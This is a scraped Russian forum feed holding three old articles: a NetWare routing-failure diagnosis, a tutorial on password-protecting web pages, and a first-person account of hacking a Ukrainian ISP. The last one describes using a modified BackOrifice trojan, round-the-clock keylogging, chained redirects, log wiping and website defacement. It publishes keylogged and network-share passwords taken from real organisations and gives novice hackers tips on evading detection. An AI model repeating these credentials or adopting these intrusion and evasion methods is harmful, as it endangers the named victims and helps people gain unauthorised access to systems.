по в МВД, существует целый отдел, одной из задач котоpого как pаз и является отслеживание &quot;электpонных&quot; взломщиков. </p> <p>Но как говоpится техническая мысль не стоит на месте, и навеpное скоpо мы услышим о новых ухищpениях хакеpов, котоpые как пить дать попытаются взломать еще чего-нибудь.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:55:52 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=28#p28 https://viktoro2007.apbb.ru/viewtopic.php?pid=27#p27 <p>Описанное здесь не является воплощением теоретических рассуждений в практику. Наоборот, происшедшие события стоили автору нескольких седых волос, а анализ ситуации привел к выводу о существовании одной достаточно эффективной атаки на отказ NetWare, кстати, осмелюсь предположить, не особенно сильно ;) описанной. (Если это не так, приношу свои извинения.) Аналог данной атаки, правда приближённый, существует с TCP/IP. </p> <p>Внешние признаки<br />В день Х юзеры пришли на работу и включили компьютеры. Примерно у двух десятков из них отказался загрузиться Windows9х. Подождав минут пять они стали нажимать кнопочки reset. После энных попыток загрузиться, юзеры, вздохнув с облегчением, повыключали свои аппараты и начали заниматься личными делами. Но один из них, чей компьютер находился рядом с моим, включив его с утра, куда-то ушёл. Комп &quot;светил&quot; черным экраном минут десять, потом вышел на запрос пароля NetWare. Придя на место, товарищ ввёл пароль, но не вошёл в сеть и, естественно, стал использовать комп в качестве простой пишущей машинки ;) Правда и там у него всё шло через пень-колоду. </p> <p>Первый день всё было тихо, однако в последующем атмосфера начала накаляться... </p> <p>Начало анализа ситуации<br />Происходило в промежутках между ответами на постоянно поступавшие злобные телефонные звонки :( </p> <p>Почти сразу стало понятно, что &quot;залипуха&quot; носит сетевой характер, т.к. выдернутый из сети комп загружался в момент. Также выяснилось, что страдальцами являются юзеры, использующие сервис именно одного конкретного, из многих Новелловских серверов. Облазил его, родимого снизу доверху - ну всё при нём, всё хорошо, режимы разные перепробовал, а коннект на него ну не идёт. </p> <p>Завершение анализа ситуации (или зачем Админу, и не только ;), бывает полезен сниффер)<br />Юзера уже несколько дней ходят - &quot;груши околачивают&quot;, а мне что - осталось только снести систему и ставить с нуля!? Не хочется, да и нет уверенности что поможет. </p> <p>Всё! Решил. Лезу вглуПь. Фильтр в NetXray (сниффер такой:)) на клиентский комп настроил, &quot;гляжу&quot; через фильтр, как комп свой черный экран демонстрирует, потом, минут через 10, выходит на логин и не входит в сеть. Трассочку (обмен пакетами) собрал. Посмотрел на неё, ничего не понял, и собрал трассу с компа, который нормально заходит в сеть. </p> <p>Что же я увидел при сравнении? Забегая вперёд - то, что мой родной сервачок абсолютно не причём, а присутствует в сети некий атакующий его объект. С этого момента описание пойдёт с использованием Новелловской конкретики. </p> <p>Процесс входа в сеть NetWare при загрузке компьютера<br />Описанное здесь происходит ещё до выхода на запрос логина. </p> <p>Вот нормальный вход компа в сеть. Проинициализировав сетевую карту, он прежде всего выдал два широковещательных SAP пакета, попросив откликнуться все ближайшие сервера. Видим, как SAP пакетами ему ответили с десяток Новелловских серверов. Каждый из них, в своем пакете сообщил своё имя и свой НОМЕР ВНУТРЕННЕЙ СЕТИ (заметим, он должен быть уникальным, на этом строится Новелловская маршрутизация). Дальше коннектящийся комп на основе этой информации и информации, хранящейся в самом компе, сообразил, к какому серверу он прежде всего пойдёт (т.е. по сути это preferred server, либо возможно сервер, где у нашего компа размещены некие сетевые ресурсы - см. примечание в конце статьи). Теперь для него встал вопрос выбора маршрута (сеть ведь может быть многосегментной). Он решает проблему так. Даёт широковещательный RIP запрос - хочу маршрут на сервер с номером сети N (конкретное число). Ну ему серверки RIP'ами отвечают - есть такой объект, только вот от меня до него 4 тика... (кто-то отвечает - 5 тиков, кто-то - 3 тика). В данном примере нужный ему сервер ответил - а у меня 2 тика (понятно, сам то я стою в том же сегменте, то есть до моей сетевой карты тик, и внутрь меня тик). То есть это я и есть :) Ну а дальше просто, маршрут до меня вообще тривиальный, устанавливай соединение через обмен NCP пакетами, затем проверим твой логин/пароль и всё ОК..... </p> <p>А вот трасса с &quot;несчастного&quot; компа. </p> <p>Залетает он в сеть, говорит - ближайшие, откликнитесь. </p> <p>Новелловские серверы ему SAP'ами - вот мы. Комп даёт широковещательный RIP - мне бы маршрут до сервера с внутренней сетью N. Они ему RIP'ы типа: от меня до него 3 тика..., 5 тиков и.т.п. И наш серверок тоже отвечает - а у меня 2 тика! И вдруг...! Пакет RIP с некого объекта: а у меня тоже 2 тика, да и номер сетки моей - тоже N! </p> <p>При анализе последовавшего за этим в голове возникает образ ослика (клиент NetWare), который стоит меж двух копен сена и издаёт лишь жалобное периодическое мычание (пакеты WDOG, WDOG, WDOG...). И заметьте, ни одного NCP для установления коннекции. В общем то его можно в чём то и понять, из двух одинаковых объектов надо однозначно выбрать один, а в Новелле его этому не учили :) </p> <p>Через несколько минут опять - ближайшие, откликнитесь. Тот же ответ. И окончательно отчаявшись он начинает тыкаться через NCP во все подряд (кроме нужного) серверы. Типа - NCP, NCP... ну создай же service connection... На каждый сервер больше десятка NCP с солидными паузами. А время идёт... </p> <p>Перебрав все соображает - баста, нет такого сервера :( И выходит на запрос логина уже со съехавшей крышей. </p> <p>А теперь вопрос: кто был тот, кто послал битый RIP? Опущу детали дальнейшего вычисления типа объекта (он был сделан через анализ SAP пакетов) и вычисление конкретного компа через перехват его траффика. Короче, им оказался обычный НТ-ёвый сервер с поднятым IPX, админ которого (УУУХХХХ.......!!!) по чистой случайности присвоил его внутренней сети тот же номер N. Естественно, что НТ не откликался на новелловский SAP но откликался на RIP, сбивая маршрутизацию. </p> <p>В заключение<br />Данная ситуация создала сбои в работе сети благодаря тому, что в средствах диагностики и на консолях ни одного из Новелловских серверов не было сообщений об ошибке. Эту ситуацию я потом моделировал в том числе и с самыми последними Новелловскими клиентами (путём подпихивания атакующего НТ - сервера) - она остаётся. Описанная ситуация возникла случайным образом, однако, кто поручится, что подобный сбой маршрутизации не использует кто-то в деструктивных целях. </p> <p>На всякий случай имейте господа сниффер под рукой и выбирайте номер сетки поэкзотичнее :-) </p> <p>Примечание. Если компьютеру при загрузке не надо идти на атакуемый сервер, то он загрузится нормально, но при попытке логина на этот сервер, он туда не попадет.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:53:19 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=27#p27 https://viktoro2007.apbb.ru/viewtopic.php?pid=26#p26 <p>Данная статья не претендует на какие-то откровения, все эти вещи достаточно очевидны и широко известны. Но получив за последнее время несколько вопросов об ограничении доступа к web-страницам, я решил свести ответы на них вместе. </p> <p>Итак, наша задача - установить пароль на доступ к некоторой странице. Начнем с самого примитивного способа, если можно так сказать, защиты - нескольких строчек на JavaScript'е. Код - что-то вроде </p> <p>var pass = prompt(&quot;Enter the Password:&quot;, &quot;&quot;);<br />if (pass == null)<br />&#160; window.location = &quot;bad.html&quot;;<br />else if (pass.toLowerCase() == &quot;wwvsfc&quot;)<br />&#160; window.location = &quot;ok.html&quot;;<br />else<br />&#160; window.location = &quot;bad.html&quot;;</p> <p>Результат можно наблюдать, к примеру, здесь. Ухищрения наподобие скрытия скрипта в отдельном файле с помощью конструкции &lt;SCRIPT SRC=&quot;security.js&quot;&gt;&lt;/SCRIPT&gt; принципиально ничего не меняют. <br />Уровнем повыше расположена аналогичная система, реализованная на Java. </p> <p>Ниже приведен упрощенный исходный код. </p> <p>import java.applet.*;<br />import java.awt.*;<br />import java.net.*;</p> <p>public class Password extends Applet<br />{</p> <p>&#160; &#160;TextField login, password;<br />&#160; &#160;String Login = &quot;login&quot;;<br />&#160; &#160;String Password = &quot;Password&quot;;<br />&#160; &#160;public Password()<br />&#160; &#160;{<br />&#160; &#160;}<br />&#160; &#160;public void init()<br />&#160; &#160;{<br />&#160; &#160; &#160; Panel panel = new Panel();<br />&#160; &#160; &#160; panel.setLayout(new GridLayout(2,2));<br />&#160; &#160; &#160; login = new TextField(20);<br />&#160; &#160; &#160; password = new TextField(20);<br />&#160; &#160; &#160; panel.add(new Label(&quot;Login:&quot;));<br />&#160; &#160; &#160; panel.add(login);<br />&#160; &#160; &#160; panel.add(new Label(&quot;Password:&quot;));<br />&#160; &#160; &#160; panel.add(password);<br />&#160; &#160; &#160; add(panel);<br />&#160; &#160; &#160; add(new Button(&quot;Ok&quot;));<br />&#160; &#160;}<br />&#160; &#160;public boolean action(Event evt, Object obj)<br />&#160; &#160;{<br />&#160; &#160; &#160; if(evt.target instanceof Button)<br />&#160; &#160; &#160; {<br />&#160; &#160; &#160; &#160; &#160;String s;<br />&#160; &#160; &#160; &#160; &#160;if(login.getText().equals(Login) &amp;&amp; password.getText().equals(Password) )<br />&#160; &#160; &#160; &#160; &#160;{<br />&#160; &#160; &#160; &#160; &#160; &#160; s = &quot;http://www.hackzone.ru/articles/ok.html&quot;;<br />&#160; &#160; &#160; &#160; &#160;}<br />&#160; &#160; &#160; &#160; &#160;else<br />&#160; &#160; &#160; &#160; &#160;{<br />&#160; &#160; &#160; &#160; &#160; &#160; s = &quot;http://www.hackzone.ru/articles/bad.html&quot;;<br />&#160; &#160; &#160; &#160; &#160;}<br />&#160; &#160; &#160; &#160; &#160;try<br />&#160; &#160; &#160; &#160; &#160;{<br />&#160; &#160; &#160; &#160; &#160; &#160; getAppletContext().showDocument(new URL(s));<br />&#160; &#160; &#160; &#160; &#160;}<br />&#160; &#160; &#160; &#160; &#160;catch(Exception e)<br />&#160; &#160; &#160; &#160; &#160;{<br />&#160; &#160; &#160; &#160; &#160; &#160; password.setText(e.toString());<br />&#160; &#160; &#160; &#160; &#160;}<br />&#160; &#160; &#160; &#160; &#160;return true;<br />&#160; &#160; &#160; }<br />&#160; &#160; &#160; return false;<br />&#160; &#160;}<br />}</p> <p>Включив этот апплет в страницу, можно получить нечто такое (во всех последующих примерах используются ok.html и bad.html от скрипта для выставления оценок статьям - ну лениво мне готовить еще какие-то страницы): </p> <p>Password check&#160; <br />&#160; </p> <p>Его можно сделать поумнее, завести для каждого пользователя отдельную страницу, заставить считывать данные из файла и т.д. Принципиальный недостаток - после того как человек попал на искомую страницу, никто не в силах запретить ему запомнить этот URL, так что средство это одноразовое. Конечно, можно запрятать страницу внутрь фрейма, чтобы URL не светился в строке адреса, но сами понимаете, от кого эта защита. Опять же, апплет полностью уходит к клиенту и в принципе полностью доступен для исследования. </p> <p>Последнего недостатка лишено решение, основанное на использовании CGI. Простенький скрипт на Perl'е выглядит примерно так: </p> <p>#!/usr/bin/perl<br />use CGI qw(:standard);<br />$query = new CGI;<br />$ok = 'ok.html';<br />$address = 'bad.html';<br />$login = &quot;login&quot;;<br />$password = &quot;password&quot;;<br />$l = $query-&gt;param(&quot;login&quot;);<br />$p = $query-&gt;param(&quot;password&quot;);<br />if(($p eq $password) &amp;&amp; ($l eq $login))<br />{<br />&#160; $address = $ok;<br />}<br />print $query-&gt;redirect($address);</p> <p>Пример использования:</p> <p>Password check <br />Login:&#160; <br />Старый пароль:&#160; </p> <p>&#160; <br /> </p> <p>Чтобы справиться с первым недостатком, можно динамически сформировать новую страницу на основе спрятанной где-то там внутри, не выдавая при этом URL. </p> <p>Модифицированный код: </p> <p>#!/usr/bin/perl<br />use CGI qw(:standard);<br />$query = new CGI;<br />$ok = 'ok.html';<br />$address = 'bad.html';<br />$docroot = $ENV{'DOCUMENT_ROOT'};<br />$localpath = &quot;/articles/&quot;;<br />$login = &quot;login&quot;;<br />$password = &quot;password&quot;;<br />$l = $query-&gt;param(&quot;login&quot;);<br />$p = $query-&gt;param(&quot;password&quot;);<br />if(($p eq $password) &amp;&amp; ($l eq $login))<br />{<br />&#160; $address = $ok;<br />}<br />print $query-&gt;header();<br />open (FL, $docroot.$localpath.$address);<br />while(&lt;FL&gt;)<br />{<br /># Здесь заодно можно на лету модифицировать html-код<br /># Зачем ? Ну мало ли... :)<br />&#160; print $_;<br />}<br />close (FL);</p> <p>Пример использования:</p> <p>Password check <br />Login:&#160; <br />Старый пароль:&#160; </p> <p>&#160; <br /> </p> <p>Как видно, URL файла уже не светится, правда ценой SSI (впрочем, их как раз можно отлавливать при выводе и обрабатывать вручную). Но и здесь остается теоретическая возможность угадывания URL, при этом не надо забывать, что медвежью услугу могут сослужить всевозможные картинки, включаемые в страницы - при использовании относительных путей, конечно. </p> <p>Наконец, наиболее надежный способ установки пароля на доступ - это воспользоваться средствами сервера - не зря ж их люди делали, в конце концов. Остановлюсь на двух - Апаче как самом популярном и IIS как тоже популярном :) </p> <p>С IIS все совсем просто - защита осуществляется средствами NTFS, что, конечно, несколько ограничивает возможности не-администраторов сервера. Идея следующая: у пользователя IUSR_xxxx, под аккаунтом которого по умолчанию работают все посетители узла, отбирается доступ к желаемому файлу/каталогу. После чего доступ к этим файлам будут иметь только те пользователи, для которых это явно указано в Properties-&gt;Security. Понятно, что их гораздо удобнее объединять в группы. Здесь есть пара тонкостей. Во-первых, указанным пользователям должно быть дано право Logon locally (Policies-&gt;User Rights в User Manager'е). Во-вторых, если не выбрать в настройках WWW service Basic authentication (Clear Text), внутрь будут пропущены только пользователи Internet Explorer'а. </p> <p>В Apache все делается несколько иначе. Защита ставится на уровне каталогов. Соответствующие директивы могут быть помещены как в в общий конфигурационный файл (в разделе &lt;Directory&gt;), так и в файлы .htaccess. Набор директив в обоих случаях одинаков, а для большинства людей, арендующих место под сайт/страницу на чужом сервере, гораздо актуальнее второй способ. Итак, вы создаете в каталоге, доступ к которому планируется ограничить, файл .htaccess, после чего вставляете в него следующие директивы (привожу основные): </p> <p>AuthType тип контроля - обычно используется Basic. </p> <p>AuthName имя - задает имя области, в которой действительны имена и пароли пользователей. Это то самое имя, которое броузер показывает в диалоге ввода пароля. Задав одно такое имя для разных каталогов, можете сэкономить пользователям время по вводу лишнего пароля. </p> <p>AuthGroupFile имя - задает имя файла, в котором хранятся имена групп и их членов. Его формат: <br />group1: member1 member2 ... <br />group2: member3 member4 ... </p> <p>AuthUserFile имя - задает имя файла с паролями. По большому счету для его формирования надо воспользоваться утилитой htpasswd из поставки Apache. Но по крайней мере для некоторых версий сервера этот формат такой: <br />user1:passwordhash1 <br />user2:passwordhash2 </p> <p>Passwordhash вполне можно получить стандартной функцией Perl'а: <br />$hash=crypt($pass,$salt); <br />где $pass - пароль, $salt - строка из двух символов, участвующая в формировании хэша. </p> <p>Так что вполне можно автоматизировать процесс добавления новых пользователей, смену паролей через html-формы и т.д. </p> <p>require user user1 user2 и require group user1 user2 позволяют указать, какие пользователи и группы получат доступ к данному каталогу. </p> <p>require valid-user разрешает доступ всем пользователям, указанным в файле паролей системы. </p> <p>&lt;Limit method1 method2 ...&gt; ... &lt;/Limit&gt; , где methodi определяет HTTP-метод. Например, &lt;Limit GET POST&gt; ограничивает применение вложенных в нее директив случаями использования методов GET и POST (обычно этого более чем достаточно). Вложенными могут быть директивы require, order, allow и deny. </p> <p>Еще пара полезных директив - deny и allow - соответственно запрещения и разрешения доступа. Применяются примерно так: <br />deny from all <br />allow from 192.168 </p> <p>По умолчанию сначала выполняются все deny, потом все allow, так что allow from all разрешит доступ всем пользователям, не взирая ни на какие deny. Порядок можно изменить директивой order: order allow, deny. </p> <p>deny from all отлично сочетается со вторым способом защиты страниц через CGI, именно этой директивой лучше всего прикрывать всякие пароли к гостевым книгам и т.д. При попытке обращения к страницам из этого каталога пользователь получит нечто такое. </p> <p>Кстати, тут между делом демонстрируется самостоятельная обработка ошибок: в данном случае - код 403, Forbidden. Аналогично обрабатывается и всеми любимая 404, Not Found, и 401, Unauthorized. Для этого достаточно добавить в .htaccess директиву ErrorDocument код url: <br />ErrorDocument 404 /cgi-bin/bad.pl <br />ErrorDocument 403 /cgi-bin/badaccess.pl <br />ErrorDocument 401 /cgi-bin/badaccess.pl </p> <p>Все, что делает скрипт - формирует сообщение об ошибке, используя переменную окружения REQUEST_URI, так что всместо него вполне можно просто указать какую-нибудь подходящую страницу. </p> <p>Для заключительного примера используем файл .htaccess со следующим содержимым: </p> <p>AuthType Basic<br />AuthName Test<br />AuthGroupFile /my/local/path/tgroup<br />AuthUserFile /my/local/path/tuser<br />&lt;Limit GET POST&gt;<br />require group test<br />&lt;/Limit&gt;</p> <p>В файле tgroup всего одна строчка - test: login test, в файле tuser - зашифрованные пароли для login (password) и test (test). Результат можете оценить здесь. Обратите внимание, при повторном обращении к этой странице броузер понимает, что только что обращался к этой области, и не утруждает пользователя лишним запросом пароля. </p> <p>Таков вкратце минимальный набор сведений, необходимых для защиты web-страниц. Как показывает практика, более-менее доверять стоит лишь решениям, основанным на средствах, предоставляемых сервером (и то до тех пор, пока в сервере не обнаружится очередная дырка), так что если есть возможность, лучше выбирать именно их.</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:52:04 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=26#p26 https://viktoro2007.apbb.ru/viewtopic.php?pid=25#p25 <p>(первый и до сих пор один из крупнейших украинских провайдеров)</p> <p> Это произошло в субботу, 19 сентября в 12.00. Мы всего лишь сменили гордость Релкома - www - на то, чем вы можете любоваться до сих пор здесь (за что спасибо Д. Леонову). </p> <p>Надо сказать, что Релком-Украина известен параноидальной любовью к безопасности своих машин. С год тому назад на их машинах какая-то западная поисковая система засекла файлы с детской порнографией (видно просто сопоставили имя+размер уже имеющихся в коллекции ФБР картинок); с тех пор там любой работающий в шелле каждые 10 мин вводит &quot;last -20&quot;. </p> <p>Часть кейлога с виндоуз-машины Релкома:</p> <p>…toc[RETURN]sasha[RETURN]octybj89[RETURN]last -20 uueurostt[RETURN]last -20 <br />uueurost[RETURN]last –20<br />Собственно, взлом то был чисто дружеским. Мы не хотели &quot;убивать&quot; Релком. Никакая информация не была стерта (лишь файл index.html был переименован в suxxx.htm), не были выведены из строя роутеры, да и оперативность, с которой починили сайт (1,5 часа) говорит не о &quot;шустрости&quot; админов, а о том, что мы не усложняли им задачу. </p> <p>Вам не терпится узнать как же это мы ухитрились взломать чуть ли не самого защищенного провайдера Украины ? Все очень просто: люди, уделявшие особое внимание Unix серверам совсем забыли о том, что существуют открытые рабочие станции под Windows с реальными ИП-шниками.</p> <p>Л<br />и<br />р<br />и<br />ч<br />е<br />с<br />к<br />о<br />е</p> <p>о<br />т<br />с<br />т<br />у<br />п<br />л<br />е<br />н<br />и<br />е Этим летом, когда вышел BackOrifice, я написал скромненький сканер, который проверял 31337 порт на предмет BO. Запустил его на ночь. На следующее утро я получил от провайдера сообщение типа &quot;еще одно письмо с угрозой расправы за попытки сканирования сетей и я закрываю вам все UDP порты на выход&quot;. Ну что ж... Я порылся в своем ночном &quot;улове&quot;, а в каждой подсетке C оказалось по 10-15 зараженных машин, и свил себе гнездо в одном скромном институтском компьютере далекого города. Надо сказать, что BO я значительно переделал расширив возможности. Теперь сканирование сетей шло с удаленного компьютера. Подсетки я выбирал чисто случайно. Без определенной цели. Среди улова была машина (насколько я понял финансового директора) предприятия, выпускающего навигационное оборудование для оборонной промышленности РФ. Папка &quot;Мои документы&quot; имела следующее содержание: <br />Contents of directory 'c:\мои документы\*.*':<br />&#160; &#160; &#160;0 D------ 11-11-96 09:21 .<br />&#160; &#160; &#160;0 D------ 11-11-96 09:21 ..<br /> 16384 -A----- 02-20-98 16:59 Salary.xls<br />&#160; &#160; &#160;0 D------ 06-24-98 13:13 Gyrocompass<br />&#160; &#160; &#160;0 D------ 03-03-97 11:33 Отчеты<br />&#160; &#160; &#160;0 D------ 03-03-97 11:32 Планы<br />&#160; &#160; &#160;0 D------ 07-02-98 14:37 VISTA<br />&#160; &#160; &#160;0 D------ 03-26-97 15:13 Ходатайства<br />&#160; &#160; &#160;0 D------ 05-08-98 13:53 Картинки<br /> 20480 -A----- 12-16-97 15:00 График отпусков 1998.doc<br />&#160; &#160; &#160;0 D------ 07-14-98 16:24 радио<br />&#160; &#160; &#160;0 D------ 03-12-97 09:04 labels<br />&#160; &#160; &#160;0 D------ 07-02-98 09:20 Гироскопы<br />&#160; &#160; &#160;0 D------ 03-24-97 12:25 Обоснования<br /> 52224 -A----- 07-15-98 16:07 bins.doc<br />&#160; &#160; &#160;0 D------ 06-30-98 16:03 ProSoft<br /> 19456 -A----- 05-22-98 09:23 Визы1.doc<br />&#160; &#160; &#160;0 D------ 03-14-97 09:35 Распоряжения<br /> 23040 -A----- 05-28-98 08:20 list1.doc<br /> 89056 -A----- 07-15-98 16:04 Bv4bnsv2.tif<br />&#160; &#160; &#160;0 D------ 02-12-97 10:04 strat<br />567544 -A----- 07-16-98 12:54 oernst.ra<br />&#160; &#160; &#160;0 D------ 03-03-97 11:33 Служеб_зап<br />227235 -A----- 07-06-98 16:22 price-se.htm<br />&#160; &#160; &#160;0 D------ 01-28-98 15:44 КАЛМАН<br /> 19456 -A----- 12-18-97 12:21 Визы.doc<br />&#160; &#160; &#160;0 D------ 04-17-98 11:33 iso<br />&#160; &#160; &#160;0 D------ 10-01-97 18:03 федерал<br />&#160; &#160; &#160;0 D------ 05-25-98 15:54 Мафтер<br />&#160; &#160; &#160;0 D------ 04-30-98 15:24 Подпись<br /> 19456 -A----- 05-20-98 16:12 ip-адреса.doc<br />&#160; &#160; &#160;0 D------ 06-25-97 17:10 Характеристики<br />&#160; &#160; &#160;0 D------ 03-13-97 18:35 Договора<br />&#160; &#160; &#160;0 D------ 07-07-98 16:03 FOG<br /> 24064 -A----- 05-20-98 10:43 Галкин_бланк.doc<br />&#160; &#160; &#160;0 D------ 07-02-98 15:27 Итоговые собрания<br />&#160; &#160; &#160;0 D------ 07-17-97 11:08 Внутр факсы<br />&#160; &#160; &#160;0 D------ 07-09-98 15:17 Морозов<br />&#160; &#160; &#160;0 D------ 06-10-98 12:23 Трофимов<br />&#160; &#160; &#160;0 D------ 06-10-98 16:57 Столы<br />&#160; &#160; &#160;0 D------ 03-03-97 11:36 Положения<br />&#160; &#160; &#160;0 D------ 02-24-98 09:50 Программы<br />&#160; &#160;360 -A----- 07-14-98 15:58 RealPlayer.lnk<br />&#160; &#160; &#160;0 D------ 07-20-98 10:16 Приказы о командир<br />&#160; &#160; &#160;0 D------ 03-03-97 11:33 Статистика<br /> 19456 -A----- 07-16-98 15:00 Лист 5&#160; &#160; Договора подряда.doc<br />&#160; 6731 -A----- 07-28-98 10:14 Dog-pmo2.asc<br />&#160; &#160; &#160;0 D------ 03-06-98 15:20 ping<br /> 41984 -A----- 07-29-98 14:30 Dog-pmo2.doc<br />&#160; &#160; &#160;0 D------ 04-17-97 09:52 Vizitka<br />&#160; &#160; &#160;0 D------ 04-30-97 12:57 Командировки<br />&#160; &#160; &#160;0 D------ 03-26-97 11:52 Перечень ПЭВМ<br />&#160; &#160; &#160;0 D------ 07-18-97 09:27 Приказы<br />&#160; &#160; &#160;0 D------ 07-29-98 18:07 Договора подряда<br />&#160; &#160; &#160;0 D------ 07-25-97 09:54 Знаки<br />Total files: 55</p> <p>Кроме того на этой машине был доступ еще к десятку офисных компьютеров. Неплохой улов, не правда ли ? Я честно написал чудаку письмо о том, что у него проблемы и предложил приехать к ним и научить как хранить свои тайны. Чудак сказал мне &quot;спасибо&quot; и все. Orifice кто-то убил, но дальнейшее сканирование их сети показало, что у их разделенные ресурсы доступны через 139. А пароли: <br />Resource: 'P_5_VER'&#160; Password: '1478'<br />Resource: '15997'&#160; Password: '82239'<br />Resource: '1_HP_133'&#160; Password: '1478'<br />Resource: 'BTO'&#160; Password: 'BTO'<br />Resource: 'SMIRNOFF'&#160; Password: 'SMIRNOFF'<br />Resource: 'FS6'&#160; Password: '82239'<br />Resource: 'FS2'&#160; Password: 'SMIRNOFF'<br />Resource: 'FS1'&#160; Password: '1478'<br />Resource: 'HALL'&#160; Password: 'OIS'<br />Resource: 'HP150'&#160; Password: 'NESTOR'<br />Resource: 'NT'&#160; Password: '548935Yу'<br />Resource: 'ONR'&#160; Password: '1478'<br />Resource: 'OASUP'&#160; Password: '548935&#160; '<br />Resource: 'ONR'&#160; Password: '548935`?Ш '<br />ScreenSaver password: 'PSSDUDE'</p> <p>кажется так до сих пор и висят ;)). Вышеперечисленное я публикую как привет директору этого предприятия. Так что, запускайте свои Legionы. Разочаровавшись в человеческой благодарности я решил действовать более конкретно. Следующей жертвой оказался наш местный провайдер. Достаточно быстро я &quot;освоил&quot; весь их офис, включая НТ-сервер с НТФС. Кроме того, имел пароли к 3-м Юникс машинам. Так как бэкапы хранились не на специальных устройствах, а на жестких дисках, то в моей власти было за ночь уменьшить число провайдеров в нашем городе на одного. Я этого не сделал - опять написал письмо сисадмину. В качестве благодарности мне предложили слепить сайт по безопасности и около 10 часов бесплатного интернета ;)). Я опять долго смеялся над своей добротой.<br /> <br /> </p> <p>Очередной машиной, на которой мой сканер зарегестрировал наличие BackOrifice оказался 193.124.229.71 - KROK из офиса Релком-Украина. Сразу же я убил там &quot;чужую&quot; бошку и поставил свою - с паролем и измененным портом. Таким образом, я уже тогда оказал Релкому неоценимую услугу - если бы первым ее нашел не я, то проблемы могли бы быть куда серьезнее. </p> <p>Я даже и не надеялся на то, что получу от Релкома какую-то благодарность. Даже интернетовская безлимитка в Киеве мне просто не нужна, а денег они все равно не заплатили бы. Я посоветовался со своим &quot;коллегой&quot; и мы решили пока просто понаблюдать за тем как работает первый украинский провайдер, чужой опыт всегда полезен ;). </p> <p>Кейлоги велись круглосуточно практически на всех машинах, а потом мы выкачивали их пользуясь двумя редиректами. Кстати, устанавливать редиректы мне просто нравится, и как показывает практика, в том режиме, в котором мы работаем, найти нас невозможно. Много раз наши кейлоги регистрировали смены паролей. Самый простой пароль имел 5 символов (User:alesha, passw:mzo.5), а стандартно включали по 8-9 символов (Se05WebMr, NiaTwThly, EpK0Qw33). Немного посовещавшись мы приняли решение всего лишь поменять www - хоть моральное удовлетворение получить. Здесь нас поджидали некоторые трудности. Во-первых, машина ultra.ts.kiev.ua (на ней хранится ввв) оказалась уж очень хорошо защищена. Нам пришлось установить редирект на офисной машине с романтичным названием Olways для входа на нее телнетом. </p> <p>Но выход мы нашли. В субботу утром мы пользуясь редиректами закачали в один сильно захламленный инкаминг забытой богом ФТП файлы с нашей страничкой. Затем, используя двойной редирект зашли сначала телнетом на машину uacom.ts.kiev.ua (дозвоночный сервер) проверили пароли к главному серверу. </p> <p>Когда мы зашли на ultra.ts.kiev.ua то запустив фтп-клиент, повытягивали наши заготовки пока что в каталог zz. Ну, а затем уже одному не составляло труда менять ввв, пока другой чистил логи под другим паролем (кстати, root там висит как пользователь постоянно). </p> <p>Вот и все. </p> <p>Потом наделали скриншотов, закинули копию странички на Nettaxi, где ее уже убили по непонятным нам причинам и читали себе почту на Хотмэйле (тоже через редирект с выходом на вингейт (еще один редирект)). Скажите, что у нас тоже паранойя. Может быть, зато спим спокойно. Ответы, кстати, получились очень интересные. Ради них стоило все это затевать ;). </p> <p>В заключении хочу дать несколько советов провайдерам: </p> <p>Не держите у себя на работе гамеров-ламеров, и не пускайте левый народ за служебные машины. <br />Не давайте всем машинам подряд реальные ИПшники. Возможности современных компов позволяют делать проксирование\маскарадинг\НАТ без потери качества сети. Чем меньше вас видят, тем сложнее прицелиться. <br />Почаще смотрите что происходит с машинами, с которых вы запускаете Телнет, ФТП и т.п. И уж во всяком случае, не делайте этого с ИП, роутящихся через КОНКУРЕНТОВ. <br />Читайте новости о безопасности сетей. Например, обзоры Хакзоны - оперативные, интересные, достаточно подробные, да еще и на русском языке. <br />...и начинающим хакерам: <br />Не пытайтесь пользоваться BackOrifice для серьезных взломов - наша версия достаточно переделана и не оставляет следов. <br />Если вы не уверены, что вам надо что-то взломать, не взламывайте это. Здоровье сбережете. Мы описали идеально простой взлом, но даже здесь не все было так гладко. <br />Не светитесь. Пользуйтесь редиректами, анонимайзерами... Отработайте сначала взлом в моделе на своей локалке и попробуйте найти свои же следы. Не лезьте в незнакомые ОС. <br />Читай пункт 4 советов провайдерам. </p> <p>--------------------------------------------------------------------------------</p> <p>Ну, и наконец, для тех, кто думает о своей безопасности или хочет &quot;проверить, насколько защищены их конкуренты&quot;, мы оставляем свой почтовый ящик.</p> <p>--------------------------------------------------------------------------------</p> <p>Несколько писем с Хотмэйла<br /> Hi!</p> <p> Ну мужики, ну вы даете!!!!</p> <p> А можно вопрос? А как же остальные два официальных<br /> провайдера Украины? Вот бы и их туда же!!!</p> <p> Но есть и другая строна медали ;-(<br /> Появился лишнтй повод для властей таки ввести в действие<br /> все те указы и прочее свое творчество.</p> <p> Но в любом случае спасибо за то что людям показали<br /> что молчать и ждать - это хуже чем что-то делать</p> <p> Удачи, и дай вам бог не попадаться, _никогда_<br /><br /> </p> <p>--------------------------------------------------------------------------------<br />daaaa..... , zelannoje Vami zasluzivajet uvazenija, a gumannost'<br />vdvojne, zalko to chto ja nje uvidel original'noje tvorenije, a tol'ko<br />kopiju :( hotelos'by v sljedushij raz uznat' vovremja, budu bezumno rad<br />jesli vy soobshitje nbje o Svojej ocherednoj pobedje za demokratiju v<br />Internete, jestestvenno do togo kak &quot;pole brani&quot; v (dannom sluchaje<br />WEB-sajt) raschishat sISOPY</p> <p>s uvazenijem<br />Dmitri</p> <p>NB! proshu izvenit' va ispolzovaije LAT-kodirovki ;)<br /><br /> </p> <p>--------------------------------------------------------------------------------<br />Добрый день !</p> <p>Есть предложение - телерадиокомпания ЮТАР делает о Вас пару сюжетов в новости ...<br />Возможно, это привлечет хоть какую-то часть общественности к проблеме<br />президентского указа ...</p> <p>Разумеется, Ваша анонимность гарантирована ... Если Вам так будет легче,<br />Вы можете передать нам где-либо видеокассету с записью Ваших рассуждений<br />и мотивов ... (Спиной, или без лица) ...</p> <p>Возможно, эти сюжеты смогут хоть как-то повлиять на создавшуюся ситуацию...</p> mybb@mybb.ru (2525) Wed, 05 Dec 2007 21:50:44 +0300 https://viktoro2007.apbb.ru/viewtopic.php?pid=25#p25 